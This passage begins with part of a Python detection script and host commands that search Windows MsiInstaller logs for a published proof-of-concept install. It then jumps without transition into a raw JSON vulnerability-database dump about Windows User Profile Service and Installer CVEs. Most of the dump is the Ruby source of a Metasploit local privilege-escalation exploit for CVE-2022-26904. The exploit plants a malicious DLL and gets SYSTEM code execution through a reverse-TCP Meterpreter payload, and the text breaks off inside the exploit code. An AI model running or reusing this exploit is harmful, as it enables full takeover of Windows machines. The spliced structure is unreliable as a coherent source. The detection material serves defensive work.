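    manufacturer: str
    status: str


def iter_msi_installs(xml_text: str) -> Iterator[MsiInstall]:
    """Yield every MsiInstaller 1033 record from a wevtutil-style XML dump.

    Assumption (check against your own export): the unnamed <Data> fields of
    event 1033 follow its message template, i.e. Product Name, Product Version,
    Product Language, Manufacturer, installation status.
    """
    root = ET.fromstring(f"<Events>{xml_text}</Events>")  # wevtutil emits no root element
    for ev in root.findall("e:Event", NS):
        system = ev.find("e:System", NS)
        provider = system.find("e:Provider", NS).get("Name", "")
        event_id = int(system.findtext("e:EventID", default="0", namespaces=NS))
        if provider != "MsiInstaller" or event_id != 1033:
            continue  # 1034 (product removed) and 1040/1042 (transactions) are not the signal
        data = [(d.text or "").strip() for d in ev.findall("e:EventData/e:Data", NS)]
        data += [""] * (5 - len(data))  # tolerate truncated records
        security = system.find("e:Security", NS)
        yield MsiInstall(
            time=system.find("e:TimeCreated", NS).get("SystemTime", ""),
            computer=system.findtext("e:Computer", default="", namespaces=NS),
            user_sid=security.get("UserID", "") if security is not None else "",
            product=data[0],
            version=data[1],
            manufacturer=data[3],
            status=data[4],
        )


def find_poc_installs(xml_text: str, product_name: str = POC_PRODUCT_NAME) -> List[MsiInstall]:
    """Return the 1033 records whose product name contains the PoC keyword.

    Case-insensitive substring match. A PoC rebuilt with another product name
    will not match, so a miss means "PoC-as-published not seen", not "not
    exploited"; the remaining 1033 records, grouped by user SID, are the next
    thing to review.
    """
    needle = product_name.lower()
    return [rec for rec in iter_msi_installs(xml_text) if needle in rec.product.lower()]


def _event(event_id: int, product: str, sid: str, when: str,
           version: str = "1.0.0", manufacturer: str = "Test") -> str:
    """Constructed Application-log record in the shape wevtutil /f:xml emits."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f'<System><Provider Name="MsiInstaller"/><EventID Qualifiers="0">{event_id}</EventID>'
        f'<TimeCreated SystemTime="{when}"/><Channel>Application</Channel>'
        f'<Computer>WS01</Computer><Security UserID="{sid}"/></System>'
        f'<EventData><Data>{product}</Data><Data>{version}</Data><Data>1033</Data>'  # third field: language (LCID)
        f'<Data>{manufacturer}</Data><Data>0</Data></EventData></Event>'
    )


# Constructed sample: a legitimate install by SYSTEM, the PoC install by a
# standard user, and the PoC's removal (event 1034), which must not match.
SAMPLE_XML = "".join([
    _event(1033, "7-Zip 19.00 (x64 edition)", "S-1-5-18", "2021-11-22T09:01:00Z",
           version="19.00.00.0", manufacturer="Igor Pavlov"),
    _event(1033, "test pkg", "S-1-5-21-1111111111-2222222222-3333333333-1001",
           "2021-11-22T15:40:12Z"),
    _event(1034, "test pkg", "S-1-5-21-1111111111-2222222222-3333333333-1001",
           "2021-11-22T15:40:13Z"),
])

if __name__ == "__main__":
    for hit in find_poc_installs(SAMPLE_XML):
        print(f"{hit.time} {hit.computer} user={hit.user_sid} product={hit.product!r} status={hit.status}")
```

To produce the input on a host, `wevtutil qe Application "/q:*[System[Provider[@Name='MsiInstaller'] and (EventID=1033)]]" /f:xml` gives the same records; the live-query equivalent of the match is `Get-WinEvent -FilterHashtable @{LogName='Application'; ProviderName='MsiInstaller'; Id=1033} | Where-Object Message -like '*test pkg*'`. The user SID is the field worth keeping in the alert: an install by a standard user SID rather than SYSTEM is what makes a hit interesting even when the product name has been changed.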
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-41739", "CVE-2021-41773", "CVE-2021-43883"], "modified": "2022-07-13T00:00:00", "id": "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73", "href": "https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T14:47:42", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2022 12:10pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\n**gwillcox-r7** at March 30, 2022 4:21pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": 
{"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-34484", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2021-08-24T00:00:00", "id": "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "href": "https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-29T02:20:49", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 30, 2022 4:52pm UTC reported:\n\nThis is a bypass for [CVE-2022-21919](<https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919>) which is in turn a bypass for [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484?referrer=search>). 
As noted at <https://twitter.com/billdemirkapi/status/1508527492285575172>, CVE-2022-21919 was already being exploited in the wild by using the binary from <https://github.com/klinix5/ProfSvcLPE/blob/main/DoubleJunctionEoP/Release/UserProfileSvcEoP.exe>.\n\nThe vulnerability, near as I can tell, occurs due to the `CreateDirectoryJunction()` function inside `profext.dll` not appropriately validating things before creating a directory junction between two directories. This can allow an attacker to create a directory junction between a directory they have access to and another directory that they should not have access to, thereby granting them the ability to plant files in sensitive locations and/or read sensitive files.\n\nThe exploit code for this, which was originally at <https://github.com/klinix5/SuperProfile> but which got taken down, is now available at <https://github.com/rmusser01/SuperProfile> and its associated forks. I have taken this code and updated it and touched it up a bit into a Metasploit exploit module that is now available at <https://github.com/rapid7/metasploit-framework/pull/16382>.\n\nThis exploit code utilizes this vulnerability to plant a malicious `comctl32.dll` binary in a location that the `Narrator.exe` program will try to load the DLL from when it starts. By utilizing the `ShellExecute` command with the `runas` option, we can force a UAC prompt to come up that will cause the `consent.exe` program to run. 
If the `PromptOnSecureDesktop` setting is set to `1` which is the default, this will result in `consent.exe` running as `SYSTEM` on the secure desktop, and a new `narrator.exe` instance will also spawn as `SYSTEM` on the secure desktop, which will then load the malicious `comctl32.dll` DLL and allow us to execute our code as `SYSTEM`.\n\nNote that if `PromptOnSecureDesktop` is set to 0 under the key `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`, then this LPE will not be possible as the UAC prompt will spawn as the current user vs as `SYSTEM` on the restricted desktop, and therefore we will not achieve privilege elevation, so this is a workaround for the vulnerability whilst it is not patched.\n\nIt should be noted that as this stands the current exploit requires valid credentials for another user on the system who is a non-admin user and who has permissions to log into the target computer. They must also have a profile under `C:\\Users` for the exploit to function in its current state. There have been some rumors that it might be possible to do this without a secondary login, however nothing concrete has been found so far, so we are considering this a prerequisite for exploitation for the time being.\n\nWe, aka Rapid7, have reported this vulnerability to Microsoft and have given KLINIX5, who originally found this vulnerability and wrote the original exploit code, full credit for the discovery, however Microsoft have only given us this CVE number and have not provided a timeline on when they expect a fix for this vulnerability at this time. 
It is therefore recommended to use the mitigation above until an appropriate fix is developed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-29T00:00:00", "type": "attackerkb", "title": "CVE-2022-26904", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-29T00:00:00", "id": "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "href": "https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-15T11:22:27", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-21895.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 12, 2022 12:07am UTC reported:\n\nUpdate: As predicted there is a patch bypass for this, now labeled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)\n\nAccording to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I\u2019ll summarize them here for brevity.\n\nThe original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged-on user to delete a folder on the computer.\n\nHowever upon reviewing the fix KLINIX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.\n\nSpecifically by abusing the User Profile Service\u2019s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. 
When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.\n\nUnfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\\Users\\TEMP`), is not a symbolic link, but didn\u2019t check to see if any of the folders under `C:\\Users\\TEMP` contains a symbolic link.\n\nNote that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.\n\nI\u2019d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. 
I\u2019m still looking into exactly what was patched here though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-02-08T00:00:00", "id": "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "href": "https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-21T21:04:38", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. 
Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also correlate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T17:05:48", "type": "metasploit", "title": "User Profile Arbitrary Junction Creation Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-16T00:07:35", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_26904_superprofile/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Version\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be 
insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also correlate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. 
This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. 
Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n version = get_version_info\n unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H2) ||\n version.build_number == Msf::WindowsVersion::Win11_21H2 ||\n version.build_number == Msf::WindowsVersion::Server2022\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n # Build numbers taken from https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904, and associated\n # security update information (e.g. 
https://support.microsoft.com/en-us/topic/windows-10-update-history-857b8ccb-71e4-49e5-b3f6-7073197d98fb,\n # https://support.microsoft.com/en-us/topic/windows-11-version-21h2-update-history-a19cd327-b57f-44b9-84e0-26ced7109ba9)\n if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.build_number.revision_number.between?(0, 612)\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Server2022 && version.build_number.revision_number.between?(0, 642)\n return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.build_number.revision_number.between?(0, 1644)\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.build_number.revision_number.between?(0, 2211)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.build_number.revision_number.between?(0, 2802)\n target_not_presently_supported\n 
return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.build_number.revision_number.between?(0, 5065)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012\n target_not_presently_supported\n return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update) # Includes Server 2008\n target_not_presently_supported\n return 
CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialRelease\n fail_with(Failure::NoTarget, 'Target is running Windows, but not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will 
trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. 
For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill 